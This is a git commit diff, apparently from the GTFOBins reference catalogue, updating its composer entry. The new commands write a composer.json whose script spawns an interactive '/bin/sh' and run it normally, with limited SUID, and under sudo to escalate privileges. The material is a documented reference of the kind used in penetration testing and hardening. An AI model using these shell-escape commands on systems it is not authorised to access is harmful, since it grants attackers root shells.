Update composer

- align to the GTFOBins conventions
- avoid Python
- use limited SUID instead of just SUID
This commit is contained in:
Andrea Cardaci 2020-11-08 10:33:56 +01:00
parent deaf47943f
commit 03c30e9944

View File

@ -1,23 +1,18 @@
--- ---
functions: functions:
suid: shell:
- code: | - code: |
cat << EOF > composer.json TF=$(mktemp -d)
{ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
"scripts": { composer --working-dir=$TF run-script x
"command": "python3 -c 'import pty;pty.spawn(\"bash\")'" limited-suid:
} - code: |
} TF=$(mktemp -d)
EOF echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
./composer run-script command ./composer --working-dir=$TF run-script x
sudo: sudo:
- code: | - code: |
cat << EOF > composer.json TF=$(mktemp -d)
{ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
"scripts": { sudo composer --working-dir=$TF run-script x
"command": "python3 -c 'import pty;pty.spawn(\"bash\")'"
}
}
EOF
composer run-script command
--- ---